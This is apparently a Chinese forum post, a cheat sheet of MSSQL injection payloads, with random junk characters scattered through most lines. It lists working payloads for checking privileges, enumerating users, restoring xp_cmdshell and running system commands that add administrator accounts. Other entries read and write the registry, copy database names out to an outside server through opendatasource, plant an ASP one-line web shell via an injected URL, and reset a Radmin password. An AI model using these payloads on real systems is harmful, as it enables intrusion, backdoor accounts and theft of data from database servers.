//看看是什么权限的
( Z9 f4 ^0 Q7 \1 h: a! uand 1=(Select IS_MEMBER('db_owner'))$ E+ |* J3 b! B3 b1 M7 V, l
And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;-- _1 d) T, J! U( F
% q) v" [& f, K" W. L
//检测是否有读取某数据库的权限
6 | w* ]5 u6 t1 j0 Q/ Tand 1= (Select HAS_DBACCESS('master'))
0 G0 Z, _) ?) [6 I8 J9 }And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --
T; a5 _* U& B
) \' z! C6 W/ j& d. V$ I& U' J5 d4 c8 t- n
数字类型7 K! ]7 X6 q: n* _; F6 l/ T
and char(124)%2Buser%2Bchar(124)=08 ]2 L% U3 z4 z$ |
- m* F" z; Y$ l; T3 q( F" w字符类型
) q# t5 }; |# N5 J2 K8 V s' and char(124)%2Buser%2Bchar(124)=0 and ''='
! [0 S& E0 w- D! u' |, z: B5 J" {; b; _5 Y' B, [
搜索类型7 ?7 r$ [; j! c2 t6 h- D( x
' and char(124)%2Buser%2Bchar(124)=0 and '%'=') x- w6 D- [; ~' f. O) G
$ R1 L1 Q+ f$ r w7 J; U- _爆用户名
+ r( ] y$ J* V0 A* e ?3 Nand user>0+ m! B; r q9 \" ^( ~
' and user>0 and ''='! d: h9 J# k7 F, B5 K
/ O. ?* W- l5 V6 Q% @检测是否为SA权限7 S+ e8 K4 k) h. l* Y
and 1=(select IS_SRVROLEMEMBER('sysadmin'));--& ^+ k: U8 T( `/ u2 o
And char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --" T; H. ]2 k, F# Z% q
2 d) N. ^- R3 Q8 A5 U! C检测是不是MSSQL数据库
/ ~' P# W7 A0 @ V2 B- `and exists (select * from sysobjects);--
8 R% B; Q+ A0 l' w: V5 V6 b$ _& q* s. K3 @+ V# T% Z6 \! j
检测是否支持多行
' \% K0 J3 r9 ?' a; W, r;declare @d int;--5 I/ j: L2 p8 p, C
% T9 ^- B4 ^8 Y/ s: q
恢复 xp_cmdshell
2 H4 l6 `5 e8 x2 F;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--' o* e0 x {$ ?& g# L
2 w V) x; M' ^" L
1 Q/ t4 z) r! B2 D
select * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version')
) r( ~# F( h# h7 [7 @5 U2 Y. L' Y6 h1 H8 T; o. M
//-----------------------% F- S! O; L) u( l3 z
// 执行命令' y9 T% `- w7 p# C6 r% _! a
//------------------------ l! X3 E6 E1 q
首先开启沙盘模式:7 ^6 Q. p9 @, E8 Y/ a& H
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1. C; \0 @) ^! O
- a5 u+ x) u( p; L/ c然后利用jet.oledb执行系统命令
; T) \6 Q( L/ y: i. A2 Mselect * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')4 c: Q2 L1 ]+ k' p) _9 ]" i
3 W' D% }& I+ t E2 |1 z执行命令- ]3 z& k. S/ d4 k% ?- g
;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--# k9 f) U9 Z0 _4 v6 O
' a* Q( s7 F# }EXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'
6 l% o: D6 O+ h. D6 H& A' [* p1 _
判断xp_cmdshell扩展存储过程是否存在:8 @3 G) Y$ A) k& j8 F2 M1 C
http://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')% l! J0 i. I. [4 q
* p* X. p2 V Y, p# A& K写注册表
$ u x0 e/ ]7 J1 o, }" [exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',16 x( k2 \. N: g/ z* \+ U. h# |
n5 e( W1 S- f- U: ?5 h' j1 Z6 Q
REG_SZ( w/ L! V/ F8 S/ y( U, _5 M& x) z
& n: l$ v8 y4 T+ Y5 l# A% v7 L' l读注册表, v* a( }6 @' Z# y
exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'
2 Y2 q- H3 T' y c7 c+ m, X/ e4 d. Q: ?
读取目录内容
: T$ x2 B) n: b! E. X$ pexec master..xp_dirtree 'c:\winnt\system32\',1,1+ D- K6 Z/ n- N
! x) X7 b5 ?1 G9 y
, u' {7 H, p6 }$ [8 Z$ p( t数据库备份4 m1 n6 f7 r: I, `
backup database pubs to disk = 'c:\123.bak'% L9 [8 B* h" u6 m
, K8 [: l/ K; J% P, ?//爆出长度, W( `9 d; w% i4 ?4 h/ R* v
And (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--
1 _/ B' j+ V8 f4 ?+ J( j P" ~: v; p
% Y1 u8 R. X/ e+ ~% Q7 @! D& H8 B6 x3 B% G
4 S6 Z, t' D$ B" q更改sa口令方法:用sql综合利用工具连接后,执行命令:) l) w; g" ^* X/ l" s
exec sp_password NULL,'新密码','sa'1 z. i: S' Q! V
{# J! M9 \: o% W
添加和删除一个SA权限的用户test:# ?" _ G% a1 o/ D5 `# ~+ x7 z
exec master.dbo.sp_addlogin test,95307728 ~3 k4 h* c+ a: \8 f" q. t+ J' ^
exec master.dbo.sp_addsrvrolemember test,sysadmin
+ k/ u3 Q/ x) F1 }
9 ?4 {1 H2 _7 ?9 u, |/ m删除扩展存储过过程xp_cmdshell的语句:8 v( D5 }7 y9 k& X, P
exec sp_dropextendedproc 'xp_cmdshell'
; b4 ?; t* W* N _- Z6 |) U' i' g5 A+ j) ?
添加扩展存储过过程
3 r" G$ h$ B! s5 ?! ^! MEXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll'
$ u) V1 R$ g& NGRANT exec On xp_proxiedadata TO public4 y1 t6 z# K9 R$ U9 V
3 O! Z; r2 M D, b' U' c
% v5 Z: }+ Y( i1 }( U; g停掉或激活某个服务。
3 \0 A! V8 O* u' D/ u% N/ ]( a% p6 P7 I4 w7 [
exec master..xp_servicecontrol 'stop','schedule'9 N5 ]9 t4 |2 m7 `3 j ]
exec master..xp_servicecontrol 'start','schedule'7 y6 c4 }# o# z. y7 e+ n4 r* b
6 q. u9 \! }# N0 P- \# W
dbo.xp_subdirs4 b R2 u* @! U5 I# l
S0 b2 F5 p7 W' Y+ I- T
只列某个目录下的子目录。, M) C6 |' P/ L- E
xp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'
1 L: E4 F. s- z) L$ |5 u; e4 f2 J! J
2 g, Q; K8 l9 idbo.xp_makecab& }2 m2 u# v2 ^% w( d0 q* Z
. N- K J$ o9 I+ }
将目标多个档案压缩到某个目标档案之内。, E" G) `! J0 w$ [
所有要压缩的档案都可以接在参数列的最后方,以逗号隔开。
5 ~# h& m4 U& e. l+ i' M* n& g5 m9 @9 |4 x
dbo.xp_makecab5 A. O9 _9 ^: f5 M y! {
'c:\test.cab','mszip',1,; m7 }1 c6 W* j0 T: e# H
'C:\Inetpub\wwwroot\SQLInject\login.asp',
2 f( j9 K7 b& R+ A* E'C:\Inetpub\wwwroot\SQLInject\securelogin.asp': N* I+ M/ N: s/ X, n
; t `; |8 o; P' J. d3 |. N- f
xp_terminate_process) n9 _' R% ^$ K$ [! T* t
3 i4 J' r4 N% P" I1 t/ L' J$ U: ^停掉某个执行中的程序,但赋予的参数是 Process ID。3 D. a' ]# F, P+ M4 i0 {0 d
利用”工作管理员”,透过选单「检视」-「选择字段」勾选 pid,就可以看到每个执行程序的 Process ID5 F# j- ^! ~9 X: h
' S9 W. E- J) U% S8 Rxp_terminate_process 2484
7 w# v+ T Z8 B7 L( x8 j0 s$ t s5 R. n$ c& [
xp_unpackcab
9 J; B/ {: `+ C4 N
" l: O# s% \$ v" ]( a. u" G解开压缩档。, \" o* [7 y7 v. r" Z) a: v' M
/ {- o# \9 J) z, `
xp_unpackcab 'c:\test.cab','c:\temp',1
9 R% ~, S; A9 P. S( C( @2 B1 k' ~0 j. J( e8 M ]3 n" v
6 X9 C$ d+ U' |, M0 l某机,安装了radmin,密码被修改了,regedit.exe不知道被删除了还是被改名了,net.exe不存在,没有办法使用regedit /e 导入注册文件,但是mssql是sa权限,使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为12348 I" o$ m* C, o7 I% u% z4 e- Y
9 G4 |3 h2 g3 N9 \ T/ i# G/ [+ e5 S
create database lcx;6 |/ R. x* E$ p3 @+ N4 S9 I
Create TABLE ku(name nvarchar(256) null);0 z6 w1 o" @( h% H, W
Create TABLE biao(id int NULL,name nvarchar(256) null);
; f: v0 P! i, d) \/ |8 B9 s; L9 p; I. S1 |' Z; \
//得到数据库名
; A- C0 |! H! B8 t! ~, binsert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases
6 h! w. Y( A" b6 f4 M+ {8 G5 o2 N$ t8 H- D1 ~
' Q7 e6 z# N* c! ?6 R" C0 T
//在Master中创建表,看看权限怎样# C- I0 O0 Q4 g1 B5 Z
Create TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--% z. x0 h+ f: i5 j: F
& t4 ^( @6 n0 T( k用 sp_makewebtask直接在web目录里写入一句话马:
# f- y8 u S, l) i+ Chttp://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--( b# ^+ `8 q& e( X- ^4 t, ]& K
6 a! w! D8 e1 s7 }9 r; {3 Y
//更新表内容
" f9 ~; d" V4 y1 ] r* H2 SUpdate films SET kind = 'Dramatic' Where id = 1235 T4 k) r; A& [/ @
- d! X# C* I$ P/ [; m# Z( L7 ~
//删除内容0 |7 l( o( c) n0 y; A7 J( R
delete from table_name where Stockid = 3 |
发表于 2012-9-15 14:40:13
收藏
支持
反对